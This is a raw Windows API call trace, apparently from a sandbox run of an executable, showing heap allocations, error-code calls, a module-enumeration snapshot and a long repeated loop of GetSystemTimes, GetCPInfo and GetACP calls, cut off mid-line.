[0128.900] GetLastError () returned 0x0 [0128.900] SetLastError (dwErrCode=0x0) [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x98) returned 0x3e1a00 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1f) returned 0x3e1aa0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x36) returned 0x3e1ac8 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x37) returned 0x3e1b08 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3c) returned 0x3e1b48 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x31) returned 0x3e1b90 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1bd0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x24) returned 0x3e1bf0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3e1c20 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd) returned 0x3e1c40 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x25) returned 0x3e1c58 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x39) returned 0x3e1c88 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e1cd0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1cf0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe) returned 0x3e1d10 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x69) returned 0x3e1d28 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3e) returned 0x3e1da0 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1b) returned 0x3e1de8 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1d) returned 0x3e1e10 [0128.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x48) returned 0x3e1e38 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3e1e88 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e1ea8 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1b) returned 0x3e1ec8 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x24) returned 0x3e1ef0 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x29) returned 0x3e1f20 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1e) returned 0x3e1f58 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x41) returned 0x3e1f80 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x17) returned 0x3e1fd0 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xf) returned 0x3e1ff0 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x16) returned 0x3e2008 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2a) returned 0x3e2028 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x29) returned 0x3e2060 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x15) returned 0x3e2098 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1e) returned 0x3e20b8 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2a) returned 0x3e20e0 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3e2118 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3e2138 [0128.901] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x46) returned 0x3e2158 [0128.901] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e11f8 | out: hHeap=0x3e0000) returned 1 [0128.903] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x800) returned 0x3e21a8 [0128.903] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x80) returned 0x3e11f8 [0128.903] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0128.904] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e11f8) returned 0x80 [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.904] GetLastError () returned 0x0 [0128.904] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.905] GetLastError () returned 0x0 [0128.905] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.919] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.919] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.919] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.919] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.919] SetLastError (dwErrCode=0x0) [0128.919] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.920] SetLastError (dwErrCode=0x0) [0128.920] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.921] SetLastError (dwErrCode=0x0) [0128.921] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] SetLastError (dwErrCode=0x0) [0128.922] GetLastError () returned 0x0 [0128.922] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0128.923] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0128.923] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0128.923] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0128.926] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0128.926] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0128.927] GetTickCount () returned 0x1153737 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.927] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.927] GetACP () returned 0x4e4 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.927] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.927] GetACP () returned 0x4e4 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.927] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.927] GetACP () returned 0x4e4 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.927] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.927] GetACP () returned 0x4e4 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.927] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.927] GetACP () returned 0x4e4 [0128.927] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.928] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.928] GetACP () returned 0x4e4 [0128.928] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.929] GetACP () returned 0x4e4 [0128.929] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.929] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.930] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.930] GetACP () returned 0x4e4 [0128.930] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.931] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.931] GetACP () returned 0x4e4 [0128.931] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.932] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.932] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.932] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.933] GetACP () returned 0x4e4 [0128.933] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.933] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.934] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.934] GetACP () returned 0x4e4 [0128.934] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, 